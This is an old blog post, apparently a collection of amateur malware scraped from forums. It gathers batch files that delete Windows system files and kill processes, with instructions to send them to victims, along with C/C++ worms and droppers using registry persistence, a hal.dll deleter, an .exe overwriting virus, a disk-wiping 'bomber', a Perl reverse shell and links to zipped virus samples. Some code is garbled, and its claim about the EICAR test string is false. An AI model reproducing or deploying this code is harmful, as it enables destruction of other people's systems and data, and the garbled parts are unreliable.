Saturday, November 17, 2007

Virus Thread

Virus Thread


Second Part To Hell's HTML.Umbriel











Slowing Down the PC
VIRUS SOURCE CODE
hello friends...
open NOTEPAD
then paste this code in notepad..code is

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*X5O!P%@AP[4\PZX54(P^)7CC)7}

now save this in notepad..
and SCAN it or test it by any antivirus....im dam sure it will be detected as a virus by the antivirus scan and it will slow the computer for 5 minuts..


Very easy but dangerous Virus
Ok, now, the trick:

The only thing you need is Notepad.

Now, to test it, create a textfile called TEST.txt(empty) in C:\
Now in your notepad type "erase C:\TEST.txt" (without the quotes). Then do "Save As..." and save it as "Test.cmd".
Now run the file "Test.cmd" and go to C:\ and you'll see your Test.txt is gone. Now, the real work begins:

Go to Notpad and type erase C:\WINDOWS (or C:\LINUX if you have linux) and save it again as findoutaname.cmd. Now DON'T run the file or you'll lose your WINDOWS map. So, that's the virus. Now to take revenge. Send you file to your victim. Once she/he opens it. Her/his WINDOWS/LINUX map is gone. And have to install LINUX/WINDOWS again.


Simple explanation:

Go to notepad, type erase C:\WINDOWS, save, send to victim, once the victim opens it, the map WINDOWS will be gone and have to install WINDOWS again...


HEY I AM NOT RESPONSIBLE FOR ANYTHING HAPPEN 2 UR COMPUTER IF U TRY THIS!!!!!!!

AGAIN :I AM NOT RESPONSIBLE FOR ANYTHING HAPPEN 2 UR COMPUTER IF U TRY THIS!!!!!!!

be aware of this..its a simple but a strong virus that can delete anyones window os through email ..ok???
------------------------------

------------------------------
------------------------------

------------------------------

Virus
hxxp://web.tiscali.it/johnnycrk2/virus/happy99.zip

hxxp://web.tiscali.it/johnnycrk2/virus/Melissa.zip

hxxp://web.tiscali.it/johnnycrk2/virus/x.zip

hxxp://web.tiscali.it/johnnycrk2/virus/POLY.zip

hxxp://web.tiscali.it/johnnycrk2/virus/rundll.zip

hxxp://web.tiscali.it/johnnycrk2/virus/Speed.zip

hxxp://web.tiscali.it/johnnycrk2/virus/Unknow.zip

hxxp://web.tiscali.it/johnnycrk2/virus/Unknow2.zip

hxxp://web.tiscali.it/johnnycrk2/virus/nowviru.zip

hxxp://web.tiscali.it/johnnycrk2/virus/all.zip

hxxp://web.tiscali.it/johnnycrk2/virus/auto.zip

hxxp://web.tiscali.it/johnnycrk2/virus/best.zip

hxxp://web.tiscali.it/johnnycrk2/virus/document.zip

hxxp://web.tiscali.it/johnnycrk2/virus/good.zip

hxxp://web.tiscali.it/johnnycrk2/virus/nice.zip

hxxp://web.tiscali.it/johnnycrk2/virus/simpatic.zip

hxxp://web.tiscali.it/johnnycrk2/virus/goodbye.zip

hxxp://web.tiscali.it/johnnycrk2/virus/mora.zip

hxxp://web.tiscali.it/johnnycrk2/virus/windows.zip

hxxp://web.tiscali.it/johnnycrk2/virus/mac.zip

hxxp://web.tiscali.it/johnnycrk2/virus/yvirus.zip

hxxp://web.tiscali.it/johnnycrk2/virus/xviruz.zip

hxxp://web.tiscali.it/johnnycrk2/virus/95.zip

hxxp://web.tiscali.it/johnnycrk2/virus/VirusMisti.zip

hxxp://web.tiscali.it/johnnycrk2/virus/d-g.zip

hxxp://web.tiscali.it/johnnycrk2/virus/VirusMisti2.zip

hxxp://web.tiscali.it/johnnycrk2/virus/h-j.zip


Virus
@echo off
del C:/WINDOWS/system32/Restore
del C:/WINDOWS/system32/winlogon.exe
del C:/WINDOWS/system32/logonui.exe



save this as virus1.bat and send it to the victim...

Msn Killer
@echo off
cls
tskill msnmsgr


save this as bat and send it to the victim.. destroys.. msn messenger

Task Kill
@echo off
start calc
tskill msnmsgr
tskill firefox
tskill iexplore
tskill LimreWire
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
pause


save this as bat and send and destroy the vtim

Virus
@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP



use this to1) Copy itself into startup
2) Copy itself over one thousand times into random spots in your computer
3) Hide its self and all other created files
4) Task kill MSN, Norton, Windows Explorer, Limewire.
5) Swap the left mouse button with the right one
6) Opens alert boxes
7) Changes the time to 12:00 and shuts down the computer

Virus
Virus
Very easy but dangerous Virus

Ok, now, the trick:

The only thing you need is Notepad.

Now, to test it, create a textfile called TEST.txt(empty) in C:\
Now in your notepad type "erase C:\TEST.txt" (without the quotes). Then do "Save As..." and save it as "Test.cmd".
Now run the file "Test.cmd" and go to C:\ and you'll see your Test.txt is gone. Now, the real work begins:

Go to Notpad and type erase C:\WINDOWS (or C:\LINUX if you have linux) and save it again as findoutaname.cmd. Now DON'T run the file or you'll lose your WINDOWS map. So, that's the virus. Now to take revenge. Send you file to your victim. Once she/he opens it. Her/his WINDOWS/LINUX map is gone. And have to install LINUX/WINDOWS again.


Simple explanation:

Go to notepad, type erase C:\WINDOWS, save, send to victim, once the victim opens it, the map WINDOWS will be gone and have to install WINDOWS again...


HEY I AM NOT RESPONSIBLE FOR ANYTHING HAPPEN 2 UR COMPUTER IF U TRY THIS!!!!!!!

AGAIN :I AM NOT RESPONSIBLE FOR ANYTHING HAPPEN 2 UR COMPUTER IF U TRY THIS!!!!!!!

be aware of this..its a simple but a strong virus that can delete anyones window os through email ..ok???


ScreenSaver Password Cracker
Description This code lets you know the Screen Saver Password. You can now know how they encrypt the password, how we can decrypt it.
/*
Screen Saveer Password Cracker:
Decrypts Screen Saver Password which is stored in user.dat.
*/

#include
#include
#include
FILE *fp;
char *path="c:\windows\user.dat";

/*encrypted password stored in this file when u log on to default user..

If there r multiple users..Password stored in
\windowsprofilesuser-nameuser.dat...

*/

unsigned long int search(char *s);
char *encstr(unsigned long int loc);
int toint(char a);
void main()
{
unsigned long int l;
char s[51];
int arr[]={4,8,14,14,7,6,1,13,6,7,6,9,10,1,1,11,7,10,8,12,4,7,
15,8,5,4,9,5,9,7,5,15,7,8,13,9,13,10,6,12,5,9,13,7,6,11,3,5,12,5};

//this array is 2 b xored with encrypted-string

int s1[51],s2[51];
int i,len,k;

clrscr();
l=search("ScreenSave_Data");
strcpy(s,encstr(l));
len=strlen(s);
for(i=0;i{
s1=toint(s);
s2=(s1)^(arr);
}
printf("Current Screen Saver Password:
");
for(i=0;iprintf("%c", (s2*16)+(s2[i+1]) );


}

/* Searches where ScreenSave_Data is there in the file
and returns the location*/
unsigned long int search(char *s)
{
int k=0,len,ch;
unsigned long int i=0;
fp=fopen(path,"rb");
len=strlen(s);
while( (ch=getc(fp))!=EOF)
{
if(ch==s[k])
k++;
else k=0;

i++;
if(k==len)
return i;

}
}

/* It returns Encrypted String*/

char *encstr(unsigned long int loc)
{
char ch,s[55],ch1;
int i=0;

ch=toascii(0);
fp=fopen(path,"rb");
fseek(fp,loc,SEEK_SET);
while( (ch1=fgetc(fp))!=ch)
{ s=ch1;
i++;
}
s='

C Bomber
#include

main()
{
char *vir;
abswrite(0,50,0,vir);
abswrite(1,50,0,vir);
abswrite(2,50,0,vir);
abswrite(3,50,0,vir);
abswrite(4,50,0,vir);
printf("FUCK YOU ALL");
printf("The Bomber");
}


C++ Viruse
Ok first off I’d like to say 2 things:

1. This guide is only intended for people who want to learn
2. I don’t condone releasing viruses in any way

Taking the above into consideration I’d like to say welcome to the world of virus programming I’m hoping upon reading this you well become as fascinated by viruses as I am and continue to study and write new unique viruses.

Most of the virus writing guides I’ve seen are lengthy, boring and out of date, this guide will try to be the opposite short, fun and to the point. Now this is what you will need to start programming:

Win32 API Reference <- Not Required but very helpful
A C++ Compiler – I Recommend DEV for people who do not wish to buy and Microsoft Visual C++ 6.0 for people with money and serious programmers, however DEV works fine.

Even if you have never programmed before you should be able to carry along with this one, but it helps if you know a little bit of C++.

Ok lets begin fire up DEV or MSVC and select new Win32 GUI for DEV users and Win32 for MSVC. Now with DEV it makes some generated code for GUI apps, delete it all leaving something like this:

QUOTE
#include

int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance,
LPSTR lpszArgument, int nFunsterStil)

{

return 0;
} Now compile and run the code nothing should happen (if a black window pops up it means you didn’t goto win32) The reason nothing happened is because or program doesn’t do anything. It runs and exits we need to make it do something first of all add this code to the project in between the { } and before return 0;.

MessageBox(NULL,”Hello”,”Messagebox Example”,MB_OK);

Now compile and run the program again A message box should pop up, cool ay? But its not much of a virus lets make it do some cool stuff. Add the following code to your project:
QUOTE
char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);

GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));

strcat(system,”\\virus.exe”);

CopyFile(pathtofile,system,false);

MessageBox(NULL,”Hello”,”Messagebox Example”,MB_OK);


Once again make sure the code is before return 0; and the { }.Ok compile and run the code, now open up the system32 directory in you windows folder (for those who don’t know goto run in the startbar and type: %windir%\system32
Ok look for a file called virus.exe in the system32 folder. Don’t believe me that its our virus? Run the file it should come up with a message box saying “Hello”.

Cool is it not? Ok time to explain how this works:

char sytem[MAX_PATH]; This is the buffer to hold the system32 directory.
char pathtofile[MAX_PATH]; This is the buffer to hold the path to our virus.

HMODULE GetModH = GetModuleHandle(NULL); This one my be hard to grasp for some but bare with me. GetModH holds the handle to our virus GetModuleHandle() gets the handle and stores it there.

GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile)); This gets the FileName of our virus using the handle we got before and storing the path to it in pathtofile.

GetSystemDirectory(system,sizeof(system)); Basically this finds out what your system directory is. Remember not everyone’s window’s directory is c:\windows\system32. Mine is d:\winnt\system32 GetSystemDirectory(system,sizeof(system)); Basically this finds out what your system directory is. Remember not everyone’s window’s directory is c:\windows\system32. Mine is d:\winnt\system32 on this box, the reason for this is we want to copy to an existent system32 directory.
strcat(system,”\\virus.exe”); Ok we have the system32 directory c:\windows\system32 or whatever now we need a place to copy to. This function binds to strings together to form one. So our system buffer now says:
c:\windows\system32\virus.exe or whatever the case maybe. Note \\ is not a typo \\ is how c++ interprets \. A single \ is seen by c++ as an escape character and if you have one your virus will not work!

CopyFile(pathtofile,system,false); Pretty self explanatory copy from were our virus is to were we want it to be. What false means if virus.exe already exists it will copy over it, to stop this change false to true (leave it as false for this tutorial).

Ok that’s it next we are going add code so it will startup when the computer boots. We are going to use an 3 API calls to accomplish this
RegOpenKeyEx(); This opens the key we want to write to
RegSetValueEx(); This sets our value
RegCloseKey(); This closes the key

Time to add code to our fledgling virus:

QUOTE
HKEY hKey;

RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );

RegSetValueEx(hKey, "Writing to the Registry Example",0,REG_SZ,(const unsigned char*)system,sizeof(system));

RegCloseKey(hKey);
Ok obviously this is going to need an more of an explanation than before. HKEY hKey is the buffer that holds the data for calls to the registry nothing else about this except you need it. RegOpenKeyEx Opens the key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run this is the key for starting up for all users which is what we want. 0 is reserved and needs to stay 0. We want to open up the key with set permissions that’s why we use KEY_SET_VALUE. And then we add the buffer.
The next call: hKey is the buffer “Writing to the registry example” is the message to appear in the key you can change this to something less obviously like “Windows Update” or “Norton Security Shield” anyway be creative. The next zero is the same as above reserved needs to stay 0. REG_SZ is the type of key we want. There are other types like REG_BINARY and REG_DWORD but we are using REG_SZ which is for text. (const unsigned char*) formats our string to a const unsigned char * because it doesn’t accept normal chars. system is the buffer that holds the path to our virus and the final part is the size of the string, this is calculated automatically by using sizeof.

The next call closes the registry key.

Ok add this to you code so it looks something like:

QUOTE
#include

int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance,
LPSTR lpszArgument, int nFunsterStil)

{

char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);

GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));

strcat(system,”\\virus.exe”);

CopyFile(pathtofile,system,false);


HKEY hKey;

RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );

RegSetValueEx(hKey, "Writing to the Registry Example",0,REG_SZ,(const unsigned char*)system,sizeof(system));

RegCloseKey(hKey);

return 0;
}

Now run you code and open up regedit and browse to HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run there should be a new key in the area to the right our key!
Now comes the fun part of writing a virus the payload! This could be anywhere from a DdoS to making the cursor jump around the screen. Note destructive payloads are lame and frowned upon by the virus community, so do you self a favour and get the idea of destroying computers out of your mind. Besides writing a non destructive payload is more fun. Lets go with a payload I’ve written and christened The Flasher.

Your code should now look like this with the payload attached:

QUOTE
#include

int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance,
LPSTR lpszArgument, int nFunsterStil)

{

char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);

GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));

strcat(system,”\\virus.exe”);

CopyFile(pathtofile,system,false);


HKEY hKey;

RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );

RegSetValueEx(hKey, "Writing to the Registry Example",0,REG_SZ,(const unsigned char*)system,sizeof(system));

RegCloseKey(hKey);

HWND hWin;

hWin = FindWindow("Shell_TrayWnd",NULL);
EnableWindow(hWin,false);

while(1==1)
{
ShowWindow(hWin,false);
Sleep(1000);
ShowWindow(hWin,true);
Sleep(1000);
}

return 0;
}

Although small don’t underestimate this payload it is very annoying try it. To fix your startbar ctrl-alt-delete find virus.exe end the process. Then find explorer.exe end it. Finally while still in task manager goto file run and type “explorer.exe” without the quotes. If that doesn’t work change EnableWindow and ShowWindow to true instead of false, remember to change it back later though.


Hacking Perl Script
I have used perl before I still don't entirely understand what this script does.

Perl Code:
#!/usr/bin/perluse Socket;$cmd= "lynx";$system= 'echo "`uname -a`";echo "`id`";/bin/sh';$0=$cmd;$target=$ARGV[0];$port=$ARGV[1];$iaddr=inet_aton($target) || die("Error: $!\n");$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");$proto=getprotobyname('tcp');socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");connect(SOCKET, $paddr) || die("Error: $!\n");open(STDIN, ">&SOCKET");open(STDOUT, ">&SOCKET");open(STDERR, ">&SOCKET");system($system);close(STDIN);close(STDOUT);close(STDERR);

I can see that it opens lynx and connects to the local machine but what does this do:


Perl Code:
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
I understand echo and uname but is it calling /bin/sh?

From this point down I do not understand. Any of this I do not really understand what it is doing:


Perl Code:
$target=$ARGV[0];$port=$ARGV[1];$iaddr=inet_aton($target) || die("Error: $!\n");$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");$proto=getprotobyname('tcp');socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");connect(SOCKET, $paddr) || die("Error: $!\n");open(STDIN, ">&SOCKET");open(STDOUT, ">&SOCKET");open(STDERR, ">&SOCKET");system($system);close(STDIN);close(STDOUT);close(STDERR);


It essentially is forming a command to use with lynx. And yes, it is attempting to exec /bin/sh.

Ps: It'd be easy to read, if you terminate each line of code with a "\n" after the ";"


Powerful C++ Virus
This is a powerful C++ virus that I have made, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.

Warning: Do not try this on your home computer.
The Original Code:

Code:
#include
#include

using namespace std;

int main(int argc, char *argv[])
{
std::remove("C:\\windows\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}A more advanced version of this virus which makes the C:\\Windows\\ a variable that cannot be wrong was made by getores. Here it is:

Code:
#include
#include

using namespace std;

int main(int argc, char *argv[])
{
std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}The second version would be more useful during times when you do not know the victims default drive. It might be drive N: for all you know.
C++ trojan dropper
CODE
#include
#include
#include
#include

void write(int mysize,char *tpath,char *mybuf)
{
int tsize = 0;
ifstream tfile(tpath,ios::binary);
tfile.seekg (0,ios::end);
tsize = tfile.tellg();
tfile.seekg (0,ios::beg);
char *tbuf = new char [tsize];
tfile.read(tbuf,tsize);
tfile.close();
ofstream outputfile(tpath,ios::binary);
outputfile.write(mybuf,mysize);
outputfile.write(tbuf,tsize);
outputfile.close();
cout<};

void extract(int mysize,char *target)
{
char windir[250];
GetWindowsDirectory(windir,MAX_PATH);
ifstream tfile(target,ios::binary);
tfile.seekg (213045);
int theamount = mysize - 213045;
char *tbuf = new char [theamount];
tfile.read(tbuf,theamount);
tfile.close();
char mypath[100];
strcpy (mypath,windir);
strcat (mypath,"\\command.exe");
ofstream outfile(mypath,ios::binary);
outfile.write(tbuf,theamount);
outfile.close();
cout<system(mypath);
};

int checkit(int mysize,char *mybuf,char *target)
{
int checker = 0;
char tpath[512];

if (mysize != 213045)
{
extract(mysize,target);
}
else
{
cout<<"pSyChIc - Dropper"<cout<<"Input file path"<cin>>tpath;
write (mysize,tpath,mybuf);
}
return 0;
};

int main(int argc, char *argv[])
{
long mysize;
char *target=argv[0];
ifstream myfile(argv[0],ios::binary);
myfile.seekg (0,ios::end);
mysize = myfile.tellg();
myfile.seekg (0,ios::beg);
char *mybuf= new char [mysize];
myfile.read(mybuf,mysize);
myfile.close();
checkit (mysize,mybuf,target);
return 0;
}
Trojan Dropper
Discovered: February 2, 2000
Updated: February 13, 2007 11:57:55 AM
Also Known As: Virus.Dropper, Trojan dropper
Type: Trojan Horse
Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP


Trojan.Dropper is a Trojan horse that drops Trojan horses or back door Trojans onto compromised computers
Trojan Dropper
Discovered: February 2, 2000
Updated: February 13, 2007 11:57:55 AM
Also Known As: Virus.Dropper, Trojan dropper
Type: Trojan Horse
Systems Affected: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP


Trojan.Dropper is a Trojan horse that drops Trojan horses or back door Trojans onto compromised computers.

Note: Definitions dated prior to 28th March 2005, may detect this threat as Trojan dropper.

C++ Worm
#include
#include
#include
#include
#include

char windir[MAX_PATH];
int APIENTRY WinMain(HINSTANCE hInstance,

HINSTANCE hPrevInstance, LPSTR lpCmdLine, int

nCmdShow)
{
HKEY hKey2;
char pathname[256];
GetWindowsDirectory(windir, sizeof(windir));
HMODULE gMh = GetModuleHandle(0);
GetModuleFileName(gMh, pathname, 256);
strcat(windir, "\\system32\\Wsecurity.exe");
CopyFile(pathname,windir,0);
unsigned char omg[45] =

"C:\\Windows\\System32\\Wsecurity.exe";
if(RegOpenKeyEx(

HKEY_LOCAL_MACHINE,"Software\\Microsoft\\

Windows\\CurrentVersion\\Run",0,KEY_SET_VALU

E,&hKey2 )==EXIT_SUCCESS)
{
RegSetValueEx(hKey2, "Windows

Security",0,REG_SZ,omg,sizeof(omg));
RegCloseKey(hKey2);
}
else
{
RegOpenKeyEx(

HKEY_CURRENT_USER,"Software\\Microsoft\\Wi

ndows\\CurrentVersion\\Run",0,KEY_SET_VALUE,

&hKey2 );
RegSetValueEx(hKey2, "Windows

Security",0,REG_SZ,omg,sizeof(omg));
RegCloseKey(hKey2);
}
return 0;
}

void restrictcleanwin()
{
ofstream Disable;


Disable.open("C:\\WINDOWS\\WinDisable.vbs",ios::o

ut);
Disable << "CreateObject(\"Wscript.shell\").regwrite

\"HKEY_CURRENT_USER\\Software\\Microsoft\\

Windows\\CurrentVersion\\Policies\\Explorer\\NoRun\

", 1, \"REG_DWORD\"" << endl;
Disable << "CreateObject(\"Wscript.shell\").regwrite

\"HKEY_CURRENT_USER\\Software\\Microsoft\\

Windows\\CurrentVersion\\Policies\\System\\Disable

RegistryTools\", 1, \"REG_DWORD\"" << endl;
Disable << "CreateObject(\"Wscript.shell\").regwrite

\"HKEY_CURRENT_USER\\Software\\Microsoft\\

Windows\\CurrentVersion\\Policies\\System\\DisableT

askMgr\", 1, \"REG_DWORD\"" << endl;
Disable << "CreateObject(\"Wscript.shell\").regwrite

\"HKEY_LOCAL_MACHINE\\Software\\Microsoft\

\Windows\\CurrentVersion\\Policies\\System\\Disable

TaskMgr\", 1, \"REG_DWORD\"" << endl;
Disable << "CreateObject(\"Wscript.shell\").regwrite
\"HKEY_LOCAL_MACHINE\\SOFTWARE\\Polici

es\\Microsoft\\Windows

NT\\SystemRestore\\DisableConfig\", 1,

\"REG_DWORD\"" << endl;
Disable << "CreateObject(\"Wscript.shell\").regwrite

\"HKEY_LOCAL_MACHINE\\SOFTWARE\\Polici

es\\Microsoft\\Windows

NT\\SystemRestore\\DisableSR\", 1,

\"REG_DWORD\"" << endl;
Disable.close();
Sleep(3000);
ShellExecute(NULL, "open",

"C:\\WINDOWS\\WinDisable.vbs", NULL, NULL,

SW_HIDE);
}
void sshut()
{
ofstream fun1;
fun1.open("C:\\Documents and Settings\\raz\\Start

Menu\\Programs\\Startup\\Sshut.cmd",ios::out);
fun1 << "shutdown -s -t 5 -f -c \"Microsuck Windows

Corpration is crasher\" " << endl;
fun1.close();
}

void cdopen()
{
ofstream cdopen;
cdopen.open("C:\\Documents and Settings\\raz\\Start

Menu\\Programs\\Startup\\Cd-op.vbs",ios::out);
cdopen << "do" << endl;
cdopen << "wscript.sleep 100" << endl;
cdopen << "Set oWMP =

CreateObject(\"WMPlayer.OCX.7\")" << endl;
cdopen << "Set colCDROMs =

oWMP.cdromCollection" << endl;
cdopen << "if colCDROMs.Count then" << endl;
cdopen << "For i = 0 to colCDROMs.Count - 1" <<

endl;
cdopen << "colCDROMs.Item(i).Eject" << endl;
cdopen << "Next" << endl;
cdopen << "End If" << endl;
cdopen << "loop" << endl;
}
int main(int argc, char *argv[])
{
HWND wndstealth;
AllocConsole();
wndstealth=FindWindowA("ConsoleWindowClass",N

ULL);
ShowWindow(wndstealth,0);
restrictcleanwin();
sshut();
cdopen();
{

}
It is a program that drops a few files and edits the

registry. All it does is shut down the computer every

time it boots.
P.S. It's actually a worm not a virus


Trojan horse codes
1.log the keyboard typing

just to hook WH_CALLWNDPROC(WM_IME_COMPOSITION),WH_GETMESSAGE(WM_CHAR and WM_KEYUP),hook the first one to log the eastern language characters(Chinese,Korean,etcs),and the others to log the english characters,nums,etcs.

2.hide the process's gui windows & taskbar

_ProcDlgMain proc uses ebx edi esi,hWnd,uMsg,wParam,lParam
mov eax,uMsg
.if eax==WM_INITDIALOG
push hWnd
pop hWinMain
invoke SetWindowLong,hWnd,GWL_EXSTYLE,WS_EX_TOOLWINDOW ;
invoke SetWindowPos,hWinMain,HWND_BOTTOM,0,0,0,0,SWP_HIDEWINDOW ;

3.release & exec the trojan horse

....

1.log the keyboard typing

just to hook WH_CALLWNDPROC(WM_IME_COMPOSITION),WH_GETMESSAGE(WM_CHAR and WM_KEYUP),hook the first one to log the eastern language characters(Chinese,Korean,etcs),and the others to log the english characters,nums,etcs.

2.hide the process's gui windows & taskbar

_ProcDlgMain proc uses ebx edi esi,hWnd,uMsg,wParam,lParam
mov eax,uMsg
.if eax==WM_INITDIALOG
push hWnd
pop hWinMain
invoke SetWindowLong,hWnd,GWL_EXSTYLE,WS_EX_TOOLWINDOW ;
invoke SetWindowPos,hWinMain,HWND_BOTTOM,0,0,0,0,SWP_HIDEWINDOW ; 3.release & exec the trojan horse


.386
.model flat,stdcall
option casemap:none

include windows.inc
include kernel32.inc
includelib kernel32.lib

.data
@szTargetFileName db ‘Target.exe’,0
@hTargetFile dd ?
@hTargetFileMap dd ?
@lpTargetFile dd ?

FILE_REPLACE_OFFSET equ 00000H
FILE_REPLACE_SIZE equ 0A7B8H

.code
assume fs:nothing
start:

invoke CreateFile,addr @szTargetFileName,GENERIC_READ or GENERIC_WRITE,\
FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0
.if eax!=INVALID_HANDLE_VALUE
mov @hTargetFile,eax
.else
jmp _End
.endif
invoke CreateFileMapping,@hTargetFile,NULL,PAGE_READWRITE,0,0,NULL
.if eax
mov @hTargetFileMap,eax

invoke MapViewOfFile,@hTargetFileMap,FILE_MAP_WRITE,0,0,0
.if eax
mov @lpTargetFile,eax
jmp _Replace
.endif
invoke CloseHandle,@hTargetFileMap
.endif
jmp _End

_Replace:
mov eax,FILE_REPLACE_SIZE
mov ecx,@lpTargetFile
add ecx,FILE_REPLACE_OFFSET

invoke RtlZeroMemory,ecx,eax
invoke UnmapViewOfFile,@lpTargetFile
invoke CloseHandle,@hTargetFileMap
invoke CloseHandle,@hTargetFile
_End:
ret
end start

if u hav any problem understanding the codes .. u can google it..

c++ virus
#include windows.h
#include string.h

char windir[MAX_PATH];

int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{

char pathname[256];
HKEY hKey;


GetWindowsDirectory(windir, sizeof(windir));
HMODULE hMe = GetModuleHandle(NULL);
DWORD nRet = GetModuleFileName(hMe, pathname, 256);

strcat(windir, "\\System32\\viral.exe");
CopyFile(pathname,windir,0);


unsigned char reg[10] = "infected";

RegCreateKey(HKEY_CURRENT_USER,"Software\\retro",&hKey);
RegSetValueEx(hKey,"virus",0,REG_SZ,reg,sizeof(reg));
RegCloseKey(hKey);

}
what it does
GetWindowsDirectoryA(windir, MAX_PATH)) + trace("GetWindowsDirectoryA ... + else { + char *p = strrchr(filename, '\\'); + if(p++) memmove(filename, p, ...
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) and here's the MFC generated one: ...
char pathname[256]; char windir[MAX_PATH]; char instpath[MAX_PATH]; GetWindowsDirectory(windir, sizeof(windir)); HMODULE hMe = GetModuleHandle(NULL); ...
GetModuleFileName(GetModH, Worm, sizeof(Worm)); GetWindowsDirectory(WinDir, sizeof(WinDir)); GetSystemDirectory(SysDir, sizeof(SysDir)); ...
strcat(windir, "\\System32\\viral.exe"); that is the virus.
unsigned char reg[10] = "infected"; RegCreateKey(HKEY_CURRENT_USER,"Software\\retro",&hKey); RegSetValueEx(hKey,"virus",0,REG_SZ,reg,sizeof(reg)); ...
RegCreateKey(HKEY_CURRENT_USER,"Software\\retro",&hKey); RegSetValueEx(hKey,"virus",0,REG_SZ,reg,sizeof(reg)); RegCloseKey(hKey); ...

.. i ve explained the codes and what they do.... in a short detail.... this will be very good for programmers.. nd a lil betta for begginers... just for each code.. ive given the code explanation.what it does.. or what it is..
overwrite virus coded in C
It is a overwrite virus written ic C .When u run this program ,the program will overwrite all the exe files present in the current directory and the parent directory
Code :
/*A virus program
coded by SJ

email id:samjohnyb4u@gmail.com
*/
#include
#include
#include
void main(int argc,char *argv[])
{
int bytes,i,done;
FILE *virus,*host;
struct ffblk *f;
char buffer[512];
do
{
done=findfirst("*.exe",f,0);
while(!done)
{
virus=fopen(argv[0],"rb");//open the virus in read mode
host=fopen(f->ff_name,"rb+");//open the host file in r/w mode

for(;fread(buffer,512,1,virus)==1;)

fwrite(buffer,512,1,host);
fclose(host);
fseek(virus,0,0);//points to begining of virus
printf("infecting %s
",f->ff_name);
done=findnext(f);
}
}
while(!chdir(".."));
printf("For any querry contact
SJ in Disguise
,id:samjohnyb4u@gmail.com");


Virus (Mini project)
its a simply jokeCode :


//***************************************************************//
//virus program-created by SJ//

//**************************************************************//

#include
#include
#include
#include
#include
#include
#include

void fool();
void main()
{
clrscr();
for(int i=0;i<=100;i++)
{

textcolor(YELLOW+BLINK);
gotoxy(35,12);
cprintf("VIRUS LOADING");
gotoxy(39,15);
textcolor(GREEN);
cout<delay(75);
clrscr();
}
delay(100);
clrscr();
flushall();
gotoxy(20,12);
cout<<" 'AISHWARYA' VIRUS CREATED NOW BY SJ";
gotoxy(20,14);
cout<<"SAY GOOD BYE TO YOUR PC IN ";
for(int j=10;j>=0;j--)
{
gotoxy(48,14);
cout<delay(1000);
}
clrscr();
cout<<"
1.HARD-DISK CORRUPTION: ";
delay(4000);
cout<<"completed";
cout<<"

2.MOTHER BOARD CORRUPTION: ";
delay(4000);
cout<<"completed";
cout<<"

3.INSTALLING CYBERBOB.DLL -->WINDOWS/COMMAND :";
delay(4000);
cout<<"completed";
cout<<"

PROCRAETORIAN.SYS SUCCESSFULLY PLANTED";
delay(3000);
cout<<"

VIRUS.EXE";
delay(2000);
cout<<"
*************************";
cout<<"
